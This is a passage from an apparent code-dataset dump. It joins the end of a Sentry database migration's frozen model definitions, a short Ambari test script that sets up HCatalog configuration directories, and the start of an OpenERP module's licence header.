'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'last_synced': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_verified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.authprovider': {
'Meta': {'object_name': 'AuthProvider'},
'config': ('jsonfield.fields.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'default_global_access': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'default_role': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '50'}),
'default_teams': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Team']", 'symmetrical': 'False', 'blank': 'True'}),
'flags': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_sync': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']", 'unique': 'True'}),
'provider': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'sync_time': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'})
},
'sentry.broadcast': {
'Meta': {'object_name': 'Broadcast'},
'badge': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'link': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.CharField', [], {'max_length': '256'})
},
'sentry.event': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'Event', 'db_table': "'sentry_message'", 'index_together': "(('group', 'datetime'),)"},
'data': ('sentry.db.models.fields.node.NodeField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'db_column': "'message_id'"}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "'event_set'", 'null': 'True', 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'num_comments': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'time_spent': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'null': 'True'})
},
'sentry.eventmapping': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'EventMapping'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.eventuser': {
'Meta': {'unique_together': "(('project', 'ident'), ('project', 'hash'))", 'object_name': 'EventUser', 'index_together': "(('project', 'email'), ('project', 'username'), ('project', 'ip_address'))"},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'})
},
'sentry.file': {
'Meta': {'object_name': 'File'},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True'}),
'headers': ('jsonfield.fields.JSONField', [], {'default': '{}'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'path': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'size': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'storage': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'storage_options': ('jsonfield.fields.JSONField', [], {'default': '{}'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'sentry.group': {
'Meta': {'object_name': 'Group', 'db_table': "'sentry_groupedmessage'", 'index_together': "(('project', 'first_release'),)"},
'active_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True', 'blank': 'True'}),
'first_release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']", 'null': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_public': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'level': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'num_comments': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'resolved_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'score': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '0'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'time_spent_count': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '0'}),
'time_spent_total': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '0'}),
'times_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '1', 'db_index': 'True'})
},
'sentry.groupassignee': {
'Meta': {'object_name': 'GroupAssignee', 'db_table': "'sentry_groupasignee'"},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'assignee_set'", 'unique': 'True', 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'assignee_set'", 'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'sentry_assignee_set'", 'to': "orm['sentry.User']"})
},
'sentry.groupbookmark': {
'Meta': {'unique_together': "(('project', 'user', 'group'),)", 'object_name': 'GroupBookmark'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'sentry_bookmark_set'", 'to': "orm['sentry.User']"})
},
'sentry.groupemailthread': {
'Meta': {'unique_together': "(('email', 'group'), ('email', 'msgid'))", 'object_name': 'GroupEmailThread'},
'date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'groupemail_set'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'msgid': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'groupemail_set'", 'to': "orm['sentry.Project']"})
},
'sentry.grouphash': {
'Meta': {'unique_together': "(('project', 'hash'),)", 'object_name': 'GroupHash'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'})
},
'sentry.groupmeta': {
'Meta': {'unique_together': "(('group', 'key'),)", 'object_name': 'GroupMeta'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.grouprulestatus': {
'Meta': {'unique_together': "(('rule', 'group'),)", 'object_name': 'GroupRuleStatus'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_active': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'rule': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Rule']"}),
'status': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'sentry.groupseen': {
'Meta': {'unique_together': "(('user', 'group'),)", 'object_name': 'GroupSeen'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'db_index': 'False'})
},
'sentry.grouptagkey': {
'Meta': {'unique_together': "(('project', 'group', 'key'),)", 'object_name': 'GroupTagKey'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'values_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.grouptagvalue': {
'Meta': {'unique_together': "(('project', 'key', 'value', 'group'),)", 'object_name': 'GroupTagValue', 'db_table': "'sentry_messagefiltervalue'"},
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'grouptag'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'grouptag'", 'null': 'True', 'to': "orm['sentry.Project']"}),
'times_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.helppage': {
'Meta': {'object_name': 'HelpPage'},
'content': ('django.db.models.fields.TextField', [], {}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_visible': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64', 'unique': 'True', 'null': 'True'}),
'priority': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '50'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'sentry.lostpasswordhash': {
'Meta': {'object_name': 'LostPasswordHash'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'unique': 'True'})
},
'sentry.option': {
'Meta': {'object_name': 'Option'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'value': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {})
},
'sentry.organization': {
'Meta': {'object_name': 'Organization'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'flags': ('django.db.models.fields.BigIntegerField', [], {'default': '2'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'org_memberships'", 'symmetrical': 'False', 'through': "orm['sentry.OrganizationMember']", 'to': "orm['sentry.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.organizationaccessrequest': {
'Meta': {'unique_together': "(('team', 'member'),)", 'object_name': 'OrganizationAccessRequest'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'member': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.OrganizationMember']"}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Team']"})
},
'sentry.organizationmember': {
'Meta': {'unique_together': "(('organization', 'user'), ('organization', 'email'))", 'object_name': 'OrganizationMember'},
'counter': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'flags': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'has_global_access': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'member_set'", 'to': "orm['sentry.Organization']"}),
'teams': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Team']", 'symmetrical': 'False', 'through': "orm['sentry.OrganizationMemberTeam']", 'blank': 'True'}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '50'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "'sentry_orgmember_set'", 'null': 'True', 'to': "orm['sentry.User']"})
},
'sentry.organizationmemberteam': {
'Meta': {'unique_together': "(('team', 'organizationmember'),)", 'object_name': 'OrganizationMemberTeam', 'db_table': "'sentry_organizationmember_teams'"},
'id': ('sentry.db.models.fields.bounded.BoundedAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'organizationmember': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.OrganizationMember']"}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Team']"})
},
'sentry.project': {
'Meta': {'unique_together': "(('team', 'slug'), ('organization', 'slug'))", 'object_name': 'Project'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'first_event': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'null': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Team']"})
},
'sentry.projectkey': {
'Meta': {'object_name': 'ProjectKey'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'key_set'", 'to': "orm['sentry.Project']"}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'roles': ('django.db.models.fields.BigIntegerField', [], {'default': '1'}),
'secret_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.projectoption': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'ProjectOption', 'db_table': "'sentry_projectoptions'"},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'value': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {})
},
'sentry.release': {
'Meta': {'unique_together': "(('project', 'version'),)", 'object_name': 'Release'},
'data': ('jsonfield.fields.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_released': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'date_started': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'new_groups': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'owner': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True', 'blank': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'ref': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'version': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'sentry.releasefile': {
'Meta': {'unique_together': "(('release', 'ident'),)", 'object_name': 'ReleaseFile'},
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'name': ('django.db.models.fields.TextField', [], {}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"})
},
'sentry.rule': {
'Meta': {'object_name': 'Rule'},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.savedsearch': {
'Meta': {'unique_together': "(('project', 'name'),)", 'object_name': 'SavedSearch'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'query': ('django.db.models.fields.TextField', [], {})
},
'sentry.tagkey': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'TagKey', 'db_table': "'sentry_filterkey'"},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'values_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.tagvalue': {
'Meta': {'unique_together': "(('project', 'key', 'value'),)", 'object_name': 'TagValue', 'db_table': "'sentry_filtervalue'"},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'times_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.team': {
'Meta': {'unique_together': "(('organization', 'slug'),)", 'object_name': 'Team'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.user': {
'Meta': {'object_name': 'User', 'db_table': "'auth_user'"},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_managed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'})
},
'sentry.useroption': {
'Meta': {'unique_together': "(('user', 'project', 'key'),)", 'object_name': 'UserOption'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'value': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {})
},
'sentry.userreport': {
'Meta': {'object_name': 'UserReport', 'index_together': "(('project', 'event_id'),)"},
'comments': ('django.db.models.fields.TextField', [], {}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
}
}
complete_apps = ['sentry']
symmetrical = True
| bsd-3-clause |
alexryndin/ambari | ambari-funtest/src/test/resources/stacks/HDP/2.0.7/services/HIVE/package/scripts/hcat.py | 20 | 1311 | #!/usr/bin/env python
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from resource_management import *
import sys
def hcat():
import params
Directory(params.hcat_conf_dir,
owner=params.hcat_user,
group=params.user_group,
)
Directory(params.hcat_pid_dir,
owner=params.webhcat_user,
create_parents = True
)
hcat_TemplateConfig('hcat-env.sh')
def hcat_TemplateConfig(name):
import params
TemplateConfig(format("{hcat_conf_dir}/{name}"),
owner=params.hcat_user,
group=params.user_group
)
| apache-2.0 |
3dfxmadscientist/cbss-server | addons/account_followup/__openerp__.py | 58 | 3009 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
